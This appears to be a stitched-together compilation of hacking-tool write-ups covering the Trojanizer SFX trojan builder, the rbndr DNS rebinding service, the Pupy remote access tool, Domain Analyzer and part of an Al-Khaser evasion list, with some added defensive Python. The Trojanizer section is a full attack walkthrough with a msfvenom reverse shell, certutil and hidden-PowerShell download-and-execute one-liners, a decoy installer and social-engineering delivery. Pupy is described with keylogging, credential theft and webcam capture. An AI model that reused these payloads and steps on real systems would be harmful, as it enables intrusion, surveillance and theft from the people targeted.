
Trojanizer - Trojanize Your Payload (WinRAR [SFX] Automatization)


The Trojanizer tool uses WinRAR (SFX) to compress the two files input by the user and transforms them into a self-extracting executable (.exe) archive. When the SFX archive is executed it runs both files (the payload and the legitimate application) at the same time.

To make the archive less suspicious to the target at execution time, Trojanizer will try to replace the default icon (.ico) of the SFX file with a user-selected one, and suppress all SFX archive dialog box messages (Silent=1 | Overwrite=1).

Trojanizer will not build trojans, but from the target's perspective it replicates trojan behavior
(execute the payload in the background while the legitimate application executes in the foreground).

DEPENDENCIES (backend applications)

Zenity (bash-GUIs) | Wine (x86|x64) | WinRAR.exe (installed-in-wine)
"Trojanizer.sh will download/install all dependencies as they are needed"

It is recommended to edit and configure the option SYSTEM_ARCH=[ your_sys_arch ] in the 'settings' file before attempting to run the tool for the first time.


PAYLOADS (agents) ACCEPTED

.exe | .bat | .vbs | .ps1
"All payloads that Windows/SFX can auto-extract-execute"

HINT: If 'SINGLE_EXEC=ON' is selected in the settings file, then Trojanizer will accept any kind of extension to be input.

LEGIT APPLICATIONS ACCEPTED (decoys)

.exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | etc ..
"All applications that Windows/SFX can auto-extract-execute"

ADVANCED SETTINGS


Trojanizer 'advanced options' are only accessible in the 'settings' file, and they can only be configured before running the main tool (Trojanizer.sh).

-- Presetup advanced option
Trojanizer can be configured to execute a program + command before the extraction/execution of the two compressed files (SFX archive). This allows users to take advantage of pre-installed software to execute a remote command before the actual extraction occurs on the target system. If active, Trojanizer will ask (zenity sandbox) for the command to be executed.


-- single_file_execution
Consider the following scenario: you have a DLL payload to input that you need to execute upon extraction, but SFX archives cannot execute DLL files directly. This setting allows users to input one batch script (.bat) that is going to be used to execute the DLL payload. All that Trojanizer needs to do is instruct the SFX archive to extract both files and then execute the script.bat.


The single_file_execution switch's default behavior is to compress the two files input by the user but only execute one of them at extraction time (the second file input will be executed) ...

TROJANIZER AND APPL WHITELISTING BYPASSES

A lot of awesome work has been done by a lot of people, especially @subTee, regarding application whitelisting bypass, which is eventually what we want here: execute arbitrary code abusing Microsoft built-in binaries. Windows one-liners to download a remote payload and execute arbitrary code.

The following exercise describes how to use the Trojanizer 'single_file_execution' and 'Presetup' advanced switches to drop (remotely download) and execute any payload using 'certutil' or 'powershell' application whitelisting bypass one-liners ...

1º - use metasploit to build our payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 -f exe -o payload.exe

2º - copy payload.exe to apache2 webroot and start service
cp payload.exe /var/www/html/payload.exe
service apache2 start

3º - edit Trojanizer 'settings' file and activate:
PRE_SETUP=ON
SINGLE_EXEC=ON

4º - running trojanizer tool
PAYLOAD TO BE COMPRESSED => /screenshot.png (it does not matter what you compress)
EXECUTE THIS FILE UPON EXTRACTION => /AngryBirds.exe (to be executed as decoy application)
PRESETUP SANDBOX => cmd.exe /c certutil -urlcache -split -f 'http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe'; Start-Process '%TEMP%\\payload.exe'
SFX FILENAME => AngryBirds_installer (the name of the sfx archive to be created)
REPLACE ICON => Windows-Store.ico OR Steam-logo.ico

5º - start a listener, and send the sfx archive to the target using social engineering
msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'

When the SFX archive is executed, it will download payload.exe from our apache2 webserver to the target and execute it before extracting 'screenshot.png' and 'AngryBirds.exe' (the latter will be executed to serve as the decoy).

The following one-liner uses the 'powershell (DownloadFile + start)' method to achieve the same as the previous 'certutil' exercise:
cmd.exe /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe') & start '%TEMP%\\payload.exe'

The following one-liner uses the 'powershell (IEX + DownloadString)' method to achieve almost the same (payload.ps1 does not touch disk):
cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"
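From the defender's side, the one-liners above leave recognisable command lines in process-creation telemetry. The following Python is an added example (not part of Trojanizer or the original post) that runs simple detection rules over constructed Sysmon-style events; the field names, the 192.0.2.10 address and the file paths are made up for the example.

```python
import re

# Constructed process-creation events in the style of Sysmon Event ID 1.
# These records are made up for the example and do not come from a real host.
SAMPLE_EVENTS = [
    {   # certutil download cradle spawned by an SFX-style installer in Downloads
        "ParentImage": r"C:\Users\alice\Downloads\AngryBirds_installer.exe",
        "Image": r"C:\Windows\System32\certutil.exe",
        "CommandLine": r"certutil -urlcache -split -f http://192.0.2.10/payload.exe %TEMP%\payload.exe",
    },
    {   # hidden PowerShell window using WebClient.DownloadFile
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.0.2.10/payload.exe', '%TEMP%\payload.exe')",
    },
    {   # in-memory cradle: IEX over DownloadString, nothing written to disk
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.0.2.10/payload.ps1'))\"",
    },
    {   # benign: certutil computing a file hash
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\certutil.exe",
        "CommandLine": r"certutil -hashfile C:\tools\setup.exe SHA256",
    },
    {   # benign: interactive PowerShell started from Explorer
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -c Get-Process",
    },
]

URL_RE = re.compile(r"https?://\S+")
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden")
WEBCLIENT_RE = re.compile(r"\.download(?:file|string)\s*\(")
IEX_RE = re.compile(r"\biex\b|invoke-expression")
USER_WRITABLE_RE = re.compile(r"\\(?:downloads|temp|appdata)\\")


def classify(event):
    """Return the list of rule names an event triggers (empty for benign events).

    Matching is done on lower-cased strings so that PowerShell's case-insensitive
    spellings (IEX, Iex, DownloadFile, downloadfile) are all caught.
    """
    image = event["Image"].lower()
    cmd = event["CommandLine"].lower()
    parent = event.get("ParentImage", "").lower()
    hits = []

    # certutil fetching a URL into its cache / a local file
    if image.endswith("\\certutil.exe") and "-urlcache" in cmd and URL_RE.search(cmd):
        hits.append("certutil_urlcache_download")

    if image.endswith("\\powershell.exe"):
        if WEBCLIENT_RE.search(cmd):
            hits.append("powershell_webclient_download")
        if IEX_RE.search(cmd) and "downloadstring" in cmd:
            hits.append("powershell_iex_download_cradle")
        if HIDDEN_RE.search(cmd):
            hits.append("powershell_hidden_window")

    # Only meaningful together with one of the above: the launcher lives in a
    # user-writable location, as a mailed SFX installer would.
    if hits and USER_WRITABLE_RE.search(parent):
        hits.append("launched_from_user_writable_path")
    return hits


def scan(events):
    """Run classify() over a list of events and keep only those with findings."""
    findings = []
    for index, event in enumerate(events):
        hits = classify(event)
        if hits:
            findings.append((index, hits))
    return findings
```

In a real pipeline the same rules map onto a Sysmon or EDR process-creation feed; tune the URL and path patterns against local administrative scripts before turning them into alerts.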

DOWNLOAD/INSTALL
1º - Download framework from github
git clone https://github.com/r00t-3xp10it/trojanizer.git

2º - Set file execution permissions
cd trojanizer
sudo chmod +x *.sh

3º - configure the framework
nano settings

4º - Run main tool
sudo ./Trojanizer.sh

Framework Screenshots

xsf.conf - execute both files upon extraction (trojan behavior)


xsf.conf - single_file_execution + Presetup (advanced options)


xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (certutil)


xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (powershell IEX)


Final sfx archive with icon changed


Inside the sfx archive (open with winrar) - trojan behavior


Inside the sfx archive (open with winrar) - single_file_execution



Video tutorials

Trojanizer - single_file_execution (not trojan behavior)


Trojanizer - AVG anti-virus fake installer (trojan behavior)





rbndr - Simple DNS Rebinding Service



rbndr is a very simple, non-conforming name server for testing software against DNS rebinding vulnerabilities. The server responds to queries by randomly selecting one of the addresses specified in the hostname and returning it as the answer with a very low TTL.
https://en.wikipedia.org/wiki/DNS_rebinding
DNS rebinding is a form of TOCTOU (time of check, time of use) vulnerability. You would use it if you have a service that incorrectly uses "preflight" checks to modify security properties. For example, consider a (fictional) browser plugin that has an API like this:
AllowUntrustedAccess("foobar.com");
SendArbitraryRequests("foobar.com");
And AllowUntrustedAccess() simply sends a preflight HTTP request to the host:
GET /CanIDisableSecurity HTTP/1.1
If the service returns 200, then the plugin allows the host page complete access to that hostname. This might be a security vulnerability, because you can specify an rbndr hostname that will switch between a host you control and a host you don't. The plugin might allow complete access to an arbitrary IP address (e.g. an internal service, or localhost) even if that service would not normally permit the preflight check.
This might sound unrealistic, but that's exactly how Adobe Flash, Oracle Java and lots of other products worked in the past, and many other products still work.
Read about how Adobe tried to resolve this problem in Flash here, https://www.adobe.com/devnet/flashplayer/articles/fplayer9_security.html
For software that is vulnerable to this class of attack, rbndr is an easy way to test without having to modify /etc/hosts or set up your own nameserver. If the software associates the result with just the hostname and not the hostname and IP address, then you can grant yourself access to any IP address.
The format for hostnames is simply
<ipv4 in base-16>.<ipv4 in base-16>.rbndr.us
But you can use this website to convert from dotted quads if you prefer:
https://lock.cmpxchg8b.com/rebinder.html
For example, to switch between 127.0.0.1 and 192.168.0.1 you would encode them as dwords, and then use:
7f000001.c0a80001.rbndr.us
Let's test it out:
$ host 7f000001.c0a80001.rbndr.us
7f000001.c0a80001.rbndr.us has address 192.168.0.1
$ host 7f000001.c0a80001.rbndr.us
7f000001.c0a80001.rbndr.us has address 192.168.0.1
$ host 7f000001.c0a80001.rbndr.us
7f000001.c0a80001.rbndr.us has address 192.168.0.1
$ host 7f000001.c0a80001.rbndr.us
7f000001.c0a80001.rbndr.us has address 127.0.0.1
$ host 7f000001.c0a80001.rbndr.us
7f000001.c0a80001.rbndr.us has address 127.0.0.1
$ host 7f000001.c0a80001.rbndr.us
7f000001.c0a80001.rbndr.us has address 192.168.0.1
$ host 7f000001.c0a80001.rbndr.us
7f000001.c0a80001.rbndr.us has address 127.0.0.1
$ host 7f000001.c0a80001.rbndr.us
7f000001.c0a80001.rbndr.us has address 127.0.0.1
$ host 7f000001.c0a80001.rbndr.us
7f000001.c0a80001.rbndr.us has address 192.168.0.1
As you can see, the server randomly returns one of the addresses. You might do something like this (in pseudo-code):
// Keep calling api until it resolves to the address you control and you get granted access
while (AllowUntrustedAccess("7f000001.c0a80001.rbndr.us") != true)
;

// Access granted, now wait for it to re-bind
while (ConnectToPort("7f000001.c0a80001.rbndr.us", 123) != true)
;

// Now you have access to localhost:123 even though localhost did not opt-in to reduced security.
SomethingEvil();
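To make the TOCTOU concrete, the Python below is an added example (not part of rbndr) that decodes the rbndr hostname format, simulates the random resolver offline, and contrasts the vulnerable check-then-re-resolve flow from the pseudo-code with a version that pins the address it checked. RbndrResolver, preflight_ok and the trial counts are constructed for this example; no DNS queries are made.

```python
import ipaddress
import random

RBNDR_SUFFIX = ("rbndr", "us")


def decode_rbndr_host(hostname):
    """Decode '<ipv4 hex>.<ipv4 hex>.rbndr.us' into the two IPv4Address values
    the service alternates between. Raises ValueError on anything else."""
    labels = hostname.lower().rstrip(".").split(".")
    if len(labels) != 4 or tuple(labels[2:]) != RBNDR_SUFFIX:
        raise ValueError("not an rbndr hostname: %r" % hostname)
    addrs = []
    for label in labels[:2]:
        if len(label) != 8 or any(c not in "0123456789abcdef" for c in label):
            raise ValueError("label is not 8 hex digits: %r" % label)
        addrs.append(ipaddress.IPv4Address(int(label, 16)))  # dword -> dotted quad
    return addrs[0], addrs[1]


def encode_rbndr_host(first, second):
    """Inverse of decode_rbndr_host: (127.0.0.1, 192.168.0.1) -> 7f000001.c0a80001.rbndr.us"""
    return "%08x.%08x.rbndr.us" % (int(ipaddress.IPv4Address(first)),
                                   int(ipaddress.IPv4Address(second)))


class RbndrResolver:
    """Offline stand-in for querying rbndr (constructed for this example): every
    lookup returns one of the two encoded addresses at random, mimicking the
    near-zero TTL under which each resolution may differ from the previous one."""

    def __init__(self, seed=None):
        self.rng = random.Random(seed)

    def resolve(self, hostname):
        return self.rng.choice(decode_rbndr_host(hostname))


ATTACKER_HOST = ipaddress.IPv4Address("192.168.0.1")  # the "host you control" in the text
REBIND_TARGET = ipaddress.IPv4Address("127.0.0.1")    # the host that never opted in


def preflight_ok(addr):
    """Stands in for GET /CanIDisableSecurity: only the attacker's host answers 200."""
    return addr == ATTACKER_HOST


def grant_by_hostname(resolver, hostname, attempts=50):
    """Vulnerable flow from the pseudo-code: access is keyed on the hostname and
    the name is resolved again for the real connection. Returns the address the
    connection actually reached, or None if the preflight never passed."""
    for _ in range(attempts):
        if preflight_ok(resolver.resolve(hostname)):  # time of check
            return resolver.resolve(hostname)         # time of use: re-resolved
    return None


def grant_pinned(resolver, hostname, attempts=50):
    """Hardened flow: resolve once, preflight that address, and connect to the
    very same address instead of the name, so a later rebind cannot redirect."""
    for _ in range(attempts):
        addr = resolver.resolve(hostname)             # resolve exactly once
        if preflight_ok(addr):
            return addr                               # connect to addr, not hostname
    return None


def simulate(trials=200):
    """Count how often each flow ends up connected to REBIND_TARGET.
    Returns (rebinds_by_hostname, rebinds_pinned); the second is always 0."""
    host = encode_rbndr_host(REBIND_TARGET, ATTACKER_HOST)
    by_name = pinned = 0
    for seed in range(trials):
        by_name += int(grant_by_hostname(RbndrResolver(seed), host) == REBIND_TARGET)
        pinned += int(grant_pinned(RbndrResolver(seed), host) == REBIND_TARGET)
    return by_name, pinned
```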


Pupy - Opensource, Cross-Platform (Windows, Linux, OSX, Android) Remote Administration And Post-Exploitation Tool



Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android), multi-function RAT (Remote Administration Tool) and post-exploitation tool mainly written in Python. It follows an all-in-memory execution model and leaves a very small footprint. Pupy can communicate using various transports, migrate into processes (reflective injection), and load remote Python code, Python packages and Python C extensions from memory.
Pupy modules can transparently access remote python objects using rpyc to perform various interactive tasks.
Pupy can generate payloads in multiple formats like PE executables, reflective DLLs, pure python files, powershell, apk, ... When you package a payload, you can choose a launcher (connect, bind, ...), a transport (ssl, http, rsa, obfs3, scramblesuit, ...) and a number of "scriptlets". Scriptlets are python scripts meant to be embedded to perform various tasks offline (without requiring a session), like starting a background script, adding persistence, starting a keylogger, detecting a sandbox, ...

Installation
git clone https://github.com/n1nj4sec/pupy.git pupy
cd pupy
git submodule init
git submodule update
pip install -r pupy/requirements.txt
wget https://github.com/n1nj4sec/pupy/releases/download/latest/payload_templates.txz
tar xvf payload_templates.txz && mv payload_templates/* pupy/payload_templates/ && rm payload_templates.txz && rm -r payload_templates
or refer to the wiki

Features
  • Multi-platform (tested on windows xp, 7, 8, 10, kali linux, ubuntu, osx, android)
  • On windows, the Pupy payload can be compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk :)
  • pupy can also be packed into a single .py file and run without any dependencies other than the python standard library on all OS
    • pycrypto gets replaced by pure python aes && rsa implementations when unavailable
  • Pupy can reflectively migrate into other processes
  • Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd, .so). The imported python modules do not touch the disk.
  • Pupy is easily extensible, modules are quite simple to write, sorted by os and category.
  • A lot of awesome modules are already implemented!
  • Pupy uses rpyc and a module can directly access python objects on the remote client
    • We can also access remote objects interactively from the pupy shell and you even get auto-completion of remote attributes!
  • Communication transports are modular, stackable and awesome. You could exfiltrate data using HTTP over HTTP over AES over XOR. Or any combination of the available transports !
  • Pupy can communicate using obfsproxy pluggable transports
  • All the non interactive modules can be dispatched to multiple hosts in one command
  • Commands and scripts running on remote hosts are interruptible
  • Auto-completion for commands and arguments
  • Custom config can be defined: command aliases, modules automatically run at connection, ...
  • Interactive python shells with auto-completion on the all in memory remote python interpreter can be opened
  • Interactive shells (cmd.exe, /bin/bash, ...) can be opened remotely. Remote shells on Unix & windows clients have a real tty with all keyboard signals working fine just like a ssh shell
  • Pupy can execute PE exe remotely and from memory (cf. ex with mimikatz)
  • Pupy can generate payloads in various formats : apk,lin_x86,lin_x64,so_x86,so_x64,exe_x86,exe_x64,dll_x86,dll_x64,py,pyinst,py_oneliner,ps1,ps1_oneliner,rubber_ducky
  • Pupy can be deployed in memory, from a single command line using pupygen.py's python or powershell one-liners.
  • "scriptlets" can be embedded in generated payloads to perform some tasks "offline" without needing network connectivity (ex: start keylogger, add persistence, execute custom python script, check_vm ...)
  • tons of other features, check out the implemented modules

Implemented Transports
All transports in pupy are stackable. This means that by creating a custom transport conf (pupy/network/transport/<transport_name>/conf.py), you can make your pupy session look like anything. For example you could stack HTTP over HTTP over base64 over HTTP over AES over obfs3 :o)
  • rsa
    • A layer with authentication & encryption using RSA and AES256, often stacked with other layers
  • aes
    • layer using a static AES256 key
  • ssl (the default one)
    • TCP transport wrapped with SSL
  • ssl_rsa
    • same as ssl but stacked with a rsa layer
  • http
    • layer making the traffic look like HTTP traffic. HTTP is stacked with a rsa layer
  • obfs3
  • scramblesuit
  • udp
    • rsa layer but over UDP (could be buggy, it doesn't handle packet loss yet)
  • other
    • Other layers don't really have any interest and are given as code examples: (dummy, base64, XOR, ...)

Implemented Launchers (not up to date, cf. ./pupygen.py -h)
Launchers allow pupy to run custom actions before starting the reverse connection
  • connect
    • Just connect back
  • bind
    • Bind payload instead of reverse
  • auto_proxy
    • Retrieve a list of possible SOCKS/HTTP proxies and try each one of them. Proxy retrieval methods are: registry, WPAD requests, gnome settings, HTTP_PROXY env variable

Implemented Modules (not up to date)

All platforms:
  • command execution
  • download
  • upload
  • interactive python shell with auto-completion
  • interactive shell (cmd.exe, powershell.exe, /bin/sh, /bin/bash, ...)
    • tty allocation is well supported on both windows and *nix. It looks just like an ssh shell
  • shellcode exec
  • persistence
  • socks5 proxy
  • local and remote port forwarding
  • screenshot
  • keylogger
  • run the awesome credential gathering tool LaZagne from memory !
  • sniff tools, netcreds
  • process migration (windows & linux, not osx yet)
  • ...
  • a lot of other tools (upnp client, various recon/pivot tools using impacket remotely, ...)

Windows specific :
  • migrate
    • inter process architecture injection also works (x86->x64 and x64->x86)
  • in memory execution of PE exe both x86 and x64!
  • webcam snapshot
  • microphone recorder
  • mouselogger:
    • takes small screenshots around the mouse at each click and send them back to the server
  • token manipulation
  • getsystem
  • creddump
  • tons of useful powershell scripts
  • ...

Android specific
  • Text to speech for Android to say stuff out loud
  • webcam snapshots (front cam & back cam)
  • GPS tracker !

Documentation
Refer to the wiki

Some screenshots (not up to date)
Screenshot section on the wiki


Domain Analyzer - Analyze The Security Of Any Domain By Finding All the Information Possible


Domain analyzer is a security analysis tool which automatically discovers and reports information about the given domain. Its main purpose is to analyze domains in an unattended way.

How
Domain analyzer takes a domain name and finds information about it, such as DNS servers, mail servers, IP addresses, mails on Google, SPF information, etc. After all the information is stored and organized it scans the ports of every IP found using nmap and performs several other security checks. After the ports are found, it uses the tool crawler.py from @verovaleros to spider the complete web page of all the web ports found. This tool has the option to download files and find open folders.
Current version is 0.8 and the main features are:
  • It creates a directory with all the information, including nmap output files.
  • It uses colors to highlight important information on the console.
  • It detects some security problems like host name problems, unusual port numbers and zone transfers.
  • It is heavily tested and it is very robust against DNS configuration problems.
  • It uses nmap for active host detection, port scanning and version information (including nmap scripts).
  • It searches for SPF records information to find new hostnames or IP addresses.
  • It searches for reverse DNS names and compares them to the hostname.
  • It prints out the country of every IP address.
  • It creates a PDF file with results.
  • It automatically detects and analyzes sub-domains!
  • It searches for domains emails.
  • It checks the 192 most common hostnames in the DNS servers.
  • It checks for Zone Transfer on every DNS server.
  • It finds the reverse names of the /24 network range of every IP address.
  • It finds active hosts using nmap's complete set of techniques.
  • It scans ports using nmap (remember that the SYN scan requires root).
  • It searches for host and port information using nmap.
  • It automatically detects web servers used.
  • It crawls every web server page using our crawler.py tool. See the description below.
  • It filters out hostnames based on their name.
  • It pseudo-randomly searches N domains in Google and automatically analyzes them!
  • Use CTRL-C to stop the current analysis stage and continue working.
  • It can read an external file with domain names and try to find them on the domain.
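The SPF step in the list above is a good illustration of how one record leaks further hostnames and netblocks. The Python below is an added example (not Domain Analyzer's own code) that parses an SPF record and follows include:/redirect= terms while enforcing the RFC 7208 limit of ten DNS-querying terms; the FAKE_TXT records and every domain name in them are constructed so the code runs offline.

```python
import ipaddress

# Constructed TXT records standing in for live DNS answers (made up for this example).
FAKE_TXT = {
    "example.com": "v=spf1 mx a:mail.example.com ip4:203.0.113.0/24 include:_spf.provider.example -all",
    "_spf.provider.example": "v=spf1 ip4:198.51.100.5 ip6:2001:db8::/32 a redirect=_spf2.provider.example",
    "_spf2.provider.example": "v=spf1 a:relay.provider.example ~all",
}

# Terms that cost a DNS lookup; RFC 7208 section 4.6.4 caps them at ten per
# evaluation, beyond which receivers return permerror.
LOOKUP_TERMS = {"a", "mx", "ptr", "exists", "include", "redirect"}
MAX_LOOKUPS = 10


def parse_spf(record):
    """Split an SPF record into (qualifier, term, value) tuples.

    Mechanisms carry their qualifier ('+', '-', '~', '?' or '' when implicit);
    modifiers such as redirect=host are returned with an empty qualifier.
    """
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF record: %r" % record)
    parsed = []
    for term in terms[1:]:
        head = term.split(":", 1)[0]
        if "=" in head:                             # modifier: name=value
            name, value = term.split("=", 1)
            parsed.append(("", name.lower(), value))
            continue
        qualifier = ""
        if term[0] in "+-~?":
            qualifier, term = term[0], term[1:]
        name, _, value = term.partition(":")
        name = name.split("/", 1)[0].lower()        # drop a bare 'a/24' cidr suffix
        parsed.append((qualifier, name, value))
    return parsed


def collect_spf_targets(domain, records=FAKE_TXT):
    """Walk the SPF record of `domain`, following include: and redirect=, and
    return the hostnames, MX domains and IP networks it references plus the
    number of DNS-querying terms consumed. Raises ValueError past MAX_LOOKUPS."""
    found = {"hosts": set(), "mx_domains": set(), "networks": set(), "lookups": 0}
    visited = set()

    def walk(name):
        name = name.lower()
        if name in visited:                         # include/redirect loop: stop
            return
        visited.add(name)
        record = records.get(name)
        if record is None:
            return
        redirect = None
        for _qualifier, term, value in parse_spf(record):
            if term in LOOKUP_TERMS:
                found["lookups"] += 1
                if found["lookups"] > MAX_LOOKUPS:
                    raise ValueError("SPF permerror: more than %d DNS-querying terms" % MAX_LOOKUPS)
            # 'a' and 'mx' without an explicit domain refer to the current domain
            target = value.split("/", 1)[0] or name
            if term in ("ip4", "ip6"):
                found["networks"].add(ipaddress.ip_network(value, strict=False))
            elif term in ("a", "exists"):
                found["hosts"].add(target)
            elif term == "mx":
                found["mx_domains"].add(target)
            elif term == "include":
                walk(target)
            elif term == "redirect":
                redirect = target                   # evaluated after the mechanisms
        if redirect:
            walk(redirect)

    walk(domain)
    return found
```

Every hostname and network returned is a new candidate for the reverse-DNS, host-discovery and port-scanning stages listed above.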

Bonus features
@verovaleros developed a separate python web crawler called "crawler.py". Its main features are:
  • Crawl http and https web sites.
  • Crawl http and https web sites not using common ports.
  • Uses regular expressions to find 'href' and 'src' html tag. Also content links.
  • Identifies relative links.
  • Identifies domain related emails.
  • Identifies directory indexing.
  • Detects references to URLs like 'file:', 'feed=', 'mailto:', 'javascript:' and others.
  • Use CTRL-C to stop the current crawler stage and continue working.
  • Identifies file extensions (zip, swf, sql, rar, etc.)
  • Download files to a directory:
    • Download every important file (images, documents, compressed files).
    • Or download specified files types.
    • Or download a predefined set of files (like 'document' files: .doc, .xls, .pdf, .odt, .gnumeric, etc.).
  • Maximum amount of links to crawl. A default value of 5000 URLs is set.
  • Follows redirections using HTML and JavaScript Location tag and HTTP response codes.

This extended edition has more features!
  • World-domination: You can automatically analyze the whole world! (if you have time)
  • Robin-hood: Although it is still in development, it will let you send automatically an email to the mails found during scan with the analysis information.
  • Robtex DNS: With this incredible function, every time you find a DNS server with Zone Transfer, it will retrieve from the Robtex site other domains using that DNS server! It will automatically analyze them too! This can be a never ending test! Every vulnerable DNS server can be used by hundreds of domains, which in turn can be using other vulnerable DNS servers. BEWARE! Domains retrieved can be unrelated to the first one.

Examples
  • Find 10 random domains in the .gov domain and analyze them fully (including web crawling). If it finds some Zone Transfer, retrieve more domains using them from Robtex!!
    domain_analyzer.py -d .gov -k 10 -b
  • (Very quick and dirty) Find everything related to the .edu.cn domain, store everything in directories. Do not search for active hosts, do not nmap scan them, do not reverse-dns the netblock, do not search for emails.
    domain_analyzer.py -d edu.cn -b -o -g -a -n
  • Analyze the 386.edu.ru domain fully
    domain_analyzer.py -d 386.edu.ru -b -o
  • (Pen tester mode). Analyze a domain fully. Do not find other domains. Print everything in a pdf file. Store everything on disk. When finished, open Zenmap and show me the topology of every host found at the same time!
    domain_analyzer.py -d amigos.net -o -e
  • (Quick with web crawl only). Ignore everything with 'google' on it.
    domain_analyzer.py -d mil.cn -b -o -g -a -n -v google -x '-O --reason --webxml --traceroute -sS -sV -sC -PN -n -v -p 80,4443'
  • (Everything) Crawl up to 100 URLs of this site including subdomains. Store output into a file and download every INTERESTING file found to disk.
    crawler.py -u www.386.edu.ru -w -s -m 100 -f
  • (Quick and dirty) Crawl the site very quick. Do not download files. Store the output to a file.
    crawler.py -u www.386.edu.ru -w -m 20
  • (If you want to analyze metadata later with lafoca). Verbose prints which extensions are being downloaded. Download only the set of archives corresponding to Documents (.doc, .docx, .ppt, .xls, .odt. etc.)
    crawler.py -u ieeeexplore.ieee.org/otherfiles/ -d -v
Most of these features can be deactivated.

Screenshots
  1. Example domain_analyzer.py -d .gov -k 10 -b

Installation
Just untar the .tar.gz file and copy the python files to the /usr/bin/ directory. Domain_analyzer needs to be run as root. The crawler can be run as a non-privileged user. If you want all the features (web crawler, pdf and colors), which is nice, also copy these files to /usr/bin or /usr/local/bin
  • ansistrm.py
  • crawler.py
  • pyText2pdf.py
If you have any issues with the GeoIP database, please download it from its original source and install it where your system needs it, usually at /opt/local/share/GeoIP/GeoIP.dat


Al-Khaser v0.72 - Public malware techniques used in the wild (Virtual Machine, Emulation, Debuggers, Sandbox detection)


al-khaser is a PoC "malware" application with good intentions that aims to stress your anti-malware system. It performs a bunch of common malware tricks with the goal of seeing if you stay under the radar.

Features

Anti-debugging attacks
  • IsDebuggerPresent
  • CheckRemoteDebuggerPresent
  • Process Environment Block (BeingDebugged)
  • Process Environment Block (NtGlobalFlag)
  • ProcessHeap (Flags)
  • ProcessHeap (ForceFlags)
  • NtQueryInformationProcess (ProcessDebugPort)
  • NtQueryInformationProcess (ProcessDebugFlags)
  • NtQueryInformationProcess (ProcessDebugObject)
  • NtSetInformationThread (HideThreadFromDebugger)
  • NtQueryObject (ObjectTypeInformation)
  • NtQueryObject (ObjectAllTypesInformation)
  • CloseHandle (NtClose) Invalid Handle
  • SetHandleInformation (Protected Handle)
  • UnhandledExceptionFilter
  • OutputDebugString (GetLastError())
  • Hardware Breakpoints (SEH / GetThreadContext)
  • Software Breakpoints (INT3 / 0xCC)
  • Memory Breakpoints (PAGE_GUARD)
  • Interrupt 0x2d
  • Interrupt 1
  • Parent Process (Explorer.exe)
  • SeDebugPrivilege (Csrss.exe)
  • NtYieldExecution / SwitchToThread
  • TLS callbacks
  • Process jobs

Anti-Dumping
  • Erase PE header from memory
  • SizeOfImage

Timing Attacks [Anti-Sandbox]
  • RDTSC (with CPUID to force a VM Exit)
  • RDTSC (Locky version with GetProcessHeap & CloseHandle)
  • Sleep -> SleepEx -> NtDelayExecution
  • Sleep (in a loop a small delay)
  • Sleep and check if time was accelerated (GetTickCount)
  • SetTimer (Standard Windows Timers)
  • timeSetEvent (Multimedia Timers)
  • WaitForSingleObject -> WaitForSingleObjectEx -> NtWaitForSingleObject
  • WaitForMultipleObjects -> WaitForMultipleObjectsEx -> NtWaitForMultipleObjects (todo)
  • IcmpSendEcho (CCleaner Malware)
  • CreateWaitableTimer (todo)
  • CreateTimerQueueTimer (todo)
  • Big crypto loops (todo)

Human Interaction / Generic [Anti-Sandbox]
  • Mouse movement
  • Total Physical memory (GlobalMemoryStatusEx)
  • Disk size using DeviceIoControl (IOCTL_DISK_GET_LENGTH_INFO)
  • Disk size using GetDiskFreeSpaceEx (TotalNumberOfBytes)
  • Mouse (Single click / Double click) (todo)
  • DialogBox (todo)
  • Scrolling (todo)
  • Execution after reboot (todo)
  • Count of processors (Win32/Tinba - Win32/Dyre)
  • Sandbox known product IDs (todo)
  • Color of background pixel (todo)
  • Keyboard layout (Win32/Banload) (todo)

Anti-Virtualization / Full-System Emulation
  • Registry key value artifacts
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VBOX)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (QEMU)
    • HARDWARE\Description\System (SystemBiosVersion) (VBOX)
    • HARDWARE\Description\System (SystemBiosVersion) (QEMU)
    • HARDWARE\Description\System (VideoBiosVersion) (VIRTUALBOX)
    • HARDWARE\Description\System (SystemBiosDate) (06/23/99)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
  • Registry Keys artifacts
    • "HARDWARE\ACPI\DSDT\VBOX__"
    • "HARDWARE\ACPI\FADT\VBOX__"
